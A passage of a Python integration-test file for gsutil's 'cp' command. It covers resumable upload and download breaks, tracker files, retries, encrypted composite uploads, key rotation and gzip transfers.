test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=1)
if self.test_api == ApiSelector.XML:
self.assertIn('Got retryable failure', stderr)
else:
self.assertIn('Retrying', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_streaming_upload_retry(self):
"""Tests that a streaming resumable upload completes with one retry."""
if self.test_api == ApiSelector.XML:
return unittest.skip('XML does not support resumable streaming uploads.')
bucket_uri = self.CreateBucket()
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, apitools_exceptions.BadStatusCodeError,
('unused', 'unused', 'unused'))))
# Need to reduce the JSON chunk size since streaming uploads buffer a
# full chunk.
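    # The 512 KiB stdin payload below spans two 256 KiB chunks, so the
    # injected failure occurs mid-upload and exercises the 'Retrying' path
    # asserted at the end.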
boto_configs_for_test = [('GSUtil', 'json_resumable_chunk_size',
str(256 * ONE_KIB)), ('Boto', 'num_retries', '2')]
with SetBotoConfigForTest(boto_configs_for_test):
stderr = self.RunGsUtil([
'-D', 'cp', '--testcallbackfile', test_callback_file, '-',
suri(bucket_uri, 'foo')
],
stdin='a' * 512 * ONE_KIB,
                              return_stderr=True)
self.assertIn('Retrying', stderr)
@SkipForS3('preserve_acl flag not supported for S3.')
def test_cp_preserve_no_owner(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Anonymous user can read the object and write to the bucket, but does
# not own the object.
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:R', suri(object_uri)])
self.RunGsUtil(['acl', 'ch', '-u', 'AllUsers:W', suri(bucket_uri)])
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(
['cp', '-p', suri(object_uri),
suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1)
self.assertIn('OWNER permission is required for preserving ACLs', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_progress_callbacks(self):
bucket_uri = self.CreateBucket()
final_size_string = BytesToFixedWidthString(1024**2)
final_progress_callback = final_size_string + '/' + final_size_string
fpath = self.CreateTempFile(contents=b'a' * ONE_MIB, file_name='foo')
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(2 * ONE_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
stderr = self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath],
return_stderr=True)
      self.assertEqual(1, stderr.count(final_progress_callback))
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload(self):
"""Tests that a basic resumable upload completes successfully."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
@SkipForS3('No resumable upload support for S3.')
def test_resumable_upload_break_leaves_tracker(self):
"""Tests that a tracker file is created with a resumable upload."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
try:
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri, 'foo')
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
self.assertTrue(os.path.exists(tracker_filename),
'Tracker file %s not present.' % tracker_filename)
# Test the permissions
if os.name == 'posix':
mode = oct(stat.S_IMODE(os.stat(tracker_filename).st_mode))
# Assert that only user has read/write permission
self.assertEqual(oct(0o600), mode)
finally:
DeleteTrackerFile(tracker_filename)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_size_change(self):
"""Tests a resumable upload where the uploaded file changes size.
This should fail when we read the tracker data.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * self.halt_size * 2)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_content_change(self):
"""Tests a resumable upload where the uploaded file changes content."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'XML doesn\'t make separate HTTP calls at fixed-size boundaries for '
'resumable uploads, so we can\'t guarantee that the server saves a '
'specific part of the upload.')
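    # The halting handler below stops the upload at 384 KiB, past the first
    # 256 KiB JSON chunk, so the service has already saved part of the
    # original file; re-uploading different contents against that saved state
    # must then fail the digest check asserted at the end.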
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * 512)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 384)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'b' * ONE_KIB * 512)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break_file_smaller_size(self):
"""Tests a resumable upload where the uploaded file changes content.
This should fail hash validation.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB * 512)
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
HaltingCopyCallbackHandler(True,
int(ONE_KIB) * 384)))
resumable_threshold_for_test = ('GSUtil', 'resumable_threshold',
str(ONE_KIB))
resumable_chunk_size_for_test = ('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))
with SetBotoConfigForTest(
[resumable_threshold_for_test, resumable_chunk_size_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
fpath = self.CreateTempFile(file_name='foo',
tmpdir=tmp_dir,
contents=b'a' * ONE_KIB)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('ResumableUploadAbortException', stderr)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_resume(self):
"""Tests that an encrypted composite upload resumes successfully."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
file_name = 'foobar'
source_file = self.CreateTempFile(contents=file_contents,
file_name=file_name)
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file
# that points to a previously uploaded component.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
# Create component 0 to be used in the resume; it must match the name
# that will be generated in copy_helper, so we use the same scheme.
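    # That scheme is: <tracker prefix> + PARALLEL_UPLOAD_TEMP_NAMESPACE +
    # md5(PARALLEL_UPLOAD_STATIC_SALT + <source path>) + '_<component index>',
    # which is what the lines below compute.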
encoded_name = (PARALLEL_UPLOAD_STATIC_SALT + source_file).encode(UTF8)
content_md5 = hashlib.md5()
content_md5.update(encoded_name)
digest = content_md5.hexdigest()
component_object_name = (tracker_prefix + PARALLEL_UPLOAD_TEMP_NAMESPACE +
digest + '_0')
component_size = 3
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=component_object_name,
contents=file_contents[:component_size],
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(component_object_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name,
tracker_prefix,
existing_components,
encryption_key_sha256=enc_key_sha256)
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size',
str(component_size)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn('Found 1 existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@SkipForS3('No resumable upload support for S3.')
def test_cp_composite_encrypted_upload_restart(self):
"""Tests that encrypted composite upload restarts given a different key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
dst_url = StorageUrlFromString(suri(bucket_uri, 'foo'))
file_contents = b'foobar'
source_file = self.CreateTempFile(contents=file_contents, file_name='foo')
src_url = StorageUrlFromString(source_file)
# Simulate an upload that had occurred by writing a tracker file.
tracker_file_name = GetTrackerFilePath(dst_url,
TrackerFileType.PARALLEL_UPLOAD,
self.test_api, src_url)
tracker_prefix = '123'
existing_component_name = 'foo_1'
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo_1',
contents=b'foo',
encryption_key=TEST_ENCRYPTION_KEY1)
existing_component = ObjectFromTracker(existing_component_name,
str(object_uri.generation))
existing_components = [existing_component]
enc_key_sha256 = TEST_ENCRYPTION_KEY1_SHA256_B64
WriteParallelUploadTrackerFile(tracker_file_name, tracker_prefix,
existing_components,
enc_key_sha256.decode('ascii'))
try:
# Now "resume" the upload using the original encryption key.
with SetBotoConfigForTest([
('GSUtil', 'parallel_composite_upload_threshold', '1'),
('GSUtil', 'parallel_composite_upload_component_size', '3'),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)
]):
stderr = self.RunGsUtil(
['cp', source_file, suri(bucket_uri, 'foo')], return_stderr=True)
self.assertIn(
'does not match current encryption key. '
'Deleting old components and restarting upload', stderr)
self.assertNotIn('existing temporary components to reuse.', stderr)
self.assertFalse(
os.path.exists(tracker_file_name),
'Tracker file %s should have been deleted.' % tracker_file_name)
read_contents = self.RunGsUtil(['cat', suri(bucket_uri, 'foo')],
return_stdout=True)
self.assertEqual(read_contents.encode('ascii'), file_contents)
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
  # This test temporarily makes the tracker directory unwritable, which
  # interferes with any parallel-running tests that use the tracker directory.
@NotParallelizable
@SkipForS3('No resumable upload support for S3.')
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file(self):
"""Tests a resumable upload with an unwritable tracker file."""
bucket_uri = self.CreateBucket()
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(bucket_uri, 'foo')), TrackerFileType.UPLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile(file_name='foo', contents=b'a' * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
  # This test temporarily makes the tracker directory unwritable, which
  # interferes with any parallel-running tests that use the tracker directory.
@NotParallelizable
@unittest.skipIf(IS_WINDOWS, 'chmod on dir unsupported on Windows.')
@SequentialAndParallelTransfer
def test_cp_unwritable_tracker_file_download(self):
"""Tests downloads with an unwritable tracker file."""
object_uri = self.CreateObject(contents=b'foo' * ONE_KIB)
tracker_filename = GetTrackerFilePath(
StorageUrlFromString(suri(object_uri)), TrackerFileType.DOWNLOAD,
self.test_api)
tracker_dir = os.path.dirname(tracker_filename)
fpath = self.CreateTempFile()
save_mod = os.stat(tracker_dir).st_mode
try:
os.chmod(tracker_dir, 0)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(EIGHT_MIB))
with SetBotoConfigForTest([boto_config_for_test]):
# Should succeed because we are below the threshold.
self.RunGsUtil(['cp', suri(object_uri), fpath])
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertIn('Couldn\'t write tracker file', stderr)
finally:
os.chmod(tracker_dir, save_mod)
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def _test_cp_resumable_download_break_helper(self,
boto_config,
encryption_key=None):
"""Helper function for different modes of resumable download break.
Args:
boto_config: List of boto configuration tuples for use with
SetBotoConfigForTest.
encryption_key: Base64 encryption key for object encryption (if any).
"""
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=encryption_key)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest(boto_config):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_break(self):
"""Tests that a download can be resumed after a connection break."""
self._test_cp_resumable_download_break_helper([
('GSUtil', 'resumable_threshold', str(ONE_KIB))
])
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_break(self):
"""Tests that an encrypted download resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
self._test_cp_resumable_download_break_helper(
[('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)],
encryption_key=TEST_ENCRYPTION_KEY1)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
def test_cp_resumable_encrypted_download_key_rotation(self):
"""Tests that a download restarts with a rotated encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
file_contents = b'a' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
self.assertTrue(os.path.isfile(tracker_filename))
# After simulated connection break, rotate the key on the object.
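    # 'rewrite -k' re-encrypts the object in place with the new key, which
    # also changes the object's generation even though the data is unchanged.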
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY1),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['rewrite', '-k', suri(object_uri)])
# Now resume the download using only the new encryption key. Since its
# generation changed, we must restart it.
boto_config_for_test3 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test3):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Restarting download', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
@SequentialAndParallelTransfer
def test_cp_resumable_download_etag_differs(self):
"""Tests that download restarts the file when the source object changes.
This causes the etag not to match.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
# This will create a tracker file with an ETag.
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
# Create a new object with different contents - it should have a
# different ETag since the content has changed.
object_uri = self.CreateObject(
bucket_uri=bucket_uri,
object_name='foo',
contents=b'b' * self.halt_size,
gs_idempotent_generation=object_uri.generation)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# TODO: Enable this test for sequential downloads when their tracker files are
# modified to contain the source object generation.
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_resumable_download_generation_differs(self):
"""Tests that a resumable download restarts if the generation differs."""
bucket_uri = self.CreateBucket()
file_contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=file_contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
# Overwrite the object with an identical object, increasing
# the generation but leaving other metadata the same.
identical_file = self.CreateTempFile(contents=file_contents)
self.RunGsUtil(['cp', suri(identical_file), suri(object_uri)])
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertIn('Restarting download from scratch', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), file_contents, 'File contents differ')
def test_cp_resumable_download_file_larger(self):
"""Tests download deletes the tracker file when existing file is larger."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'a' * self.halt_size)
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
with open(fpath + '_.gstmp', 'w') as larger_file:
for _ in range(self.halt_size * 2):
larger_file.write('a')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
expected_status=1,
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
self.assertIn('Deleting tracker file', stderr)
def test_cp_resumable_download_content_differs(self):
"""Tests that we do not re-download when tracker file matches existing file.
We only compare size, not contents, so re-download should not occur even
though the contents are technically different. However, hash validation on
the file should still occur and we will delete the file then because
the hashes differ.
"""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'w') as fp:
fp.write('abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
try:
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Download already complete', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
# File and tracker file should be deleted.
self.assertFalse(os.path.isfile(temp_download_file))
self.assertFalse(os.path.isfile(tracker_filename))
# Permanent file should not have been created.
self.assertFalse(os.path.isfile(fpath))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_content_matches(self):
"""Tests download no-ops when tracker file matches existing file."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir)
matching_contents = b'abcd' * ONE_KIB
temp_download_file = fpath + '_.gstmp'
with open(temp_download_file, 'wb') as fp:
fp.write(matching_contents)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=matching_contents)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match expected single ETag')
etag = etag_match.group(1)
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Download already complete', stderr)
# Tracker file should be removed after successful hash validation.
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_resumable_download_tracker_file_not_matches(self):
"""Tests that download overwrites when tracker file etag does not match."""
bucket_uri = self.CreateBucket()
tmp_dir = self.CreateTempDir()
fpath = self.CreateTempFile(tmpdir=tmp_dir, contents=b'abcd' * ONE_KIB)
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'efgh' * ONE_KIB)
stdout = self.RunGsUtil(['ls', '-L', suri(object_uri)], return_stdout=True)
etag_match = re.search(r'\s*ETag:\s*(.*)', stdout)
self.assertIsNotNone(etag_match, 'Could not get object ETag')
self.assertEqual(len(etag_match.groups()), 1,
'Did not match regex for exactly one object ETag')
etag = etag_match.group(1)
etag += 'nonmatching'
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath),
TrackerFileType.DOWNLOAD,
self.test_api)
with open(tracker_filename, 'w') as tracker_fp:
tracker_fp.write(etag)
try:
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Ensure the file was overwritten.
with open(fpath, 'r') as in_fp:
contents = in_fp.read()
self.assertEqual(
contents, 'efgh' * ONE_KIB,
'File not overwritten when it should have been '
'due to a non-matching tracker file.')
self.assertFalse(os.path.isfile(tracker_filename))
finally:
if os.path.exists(tracker_filename):
os.unlink(tracker_filename)
def test_cp_double_gzip(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
self.RunGsUtil([
'-h', 'content-type:application/gzip', 'cp', '-Z',
suri(fpath),
suri(bucket_uri, 'foo')
])
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_double_gzip_transport_encoded(self):
"""Tests that upload and download of a doubly-gzipped file succeeds."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(file_name='looks-zipped.gz', contents=b'foo')
stderr = self.RunGsUtil([
'-D', '-h', 'content-type:application/gzip', 'cp', '-J',
suri(fpath),
suri(bucket_uri, 'foo')
],
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), fpath])
@SequentialAndParallelTransfer
def test_cp_resumable_download_gzip(self):
"""Tests that download can be resumed successfully with a gzipped file."""
    # Generate some reasonably incompressible data. In practice this
    # compresses to roughly 128 KiB, but we assert below that the compressed
    # object is larger than self.halt_size to guarantee that we can halt the
    # download partway through.
object_uri = self.CreateObject()
random.seed(0)
contents = str([
        random.choice(string.ascii_letters) for _ in range(self.halt_size)
]).encode('ascii')
random.seed() # Reset the seed for any other tests.
fpath1 = self.CreateTempFile(file_name='unzipped.txt', contents=contents)
self.RunGsUtil(['cp', '-z', 'txt', suri(fpath1), suri(object_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _GetObjectSize():
stdout = self.RunGsUtil(['du', suri(object_uri)], return_stdout=True)
size_match = re.search(r'(\d+)\s+.*', stdout)
self.assertIsNotNone(size_match, 'Could not get object size')
self.assertEqual(len(size_match.groups()), 1,
'Did not match regex for exactly one object size.')
      return int(size_match.group(1))
object_size = _GetObjectSize()
self.assertGreaterEqual(
object_size, self.halt_size,
        'Compressed object size was not large enough to '
'allow for a halted download, so the test results '
'would be invalid. Please increase the compressed '
'object size in the test.')
fpath2 = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
      # Tracker files will have different names depending on whether we are
      # downloading sequentially or in parallel (sliced).
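      # The check below mirrors gsutil's own decision: sliced downloads are
      # used only when the object exceeds sliced_object_download_threshold,
      # the threshold is positive, and fast crcmod is available.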
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
